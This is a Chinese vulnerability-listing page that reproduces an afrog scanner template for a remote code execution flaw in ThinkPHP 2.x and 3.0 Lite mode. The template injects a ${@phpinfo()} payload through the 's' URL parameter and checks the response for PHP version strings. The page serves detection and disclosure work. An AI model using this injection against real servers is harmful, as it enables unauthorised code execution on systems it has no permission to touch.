thinkphp-2-rce: ThinkPHP 2 3 's' Parameter RCE

日期: 2025-09-01 | 影响软件: ThinkPHP 2 | POC: 已公开

漏洞描述

ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.

PoC代码[已公开]

id: thinkphp-2-rce

info:
  name: ThinkPHP 2 3 's' Parameter RCE
  author: dr_set
  severity: critical
  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
  reference:
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce

rules:
  r0:
    request:
      method: GET
      path: /index.php?s=/index/index/name/$%7B@phpinfo()%7D
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'PHP Extension') && 
      response.body.bcontains(b'PHP Version') && 
      response.body.bcontains(b'ThinkPHP')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-2-rce.yaml

相关漏洞推荐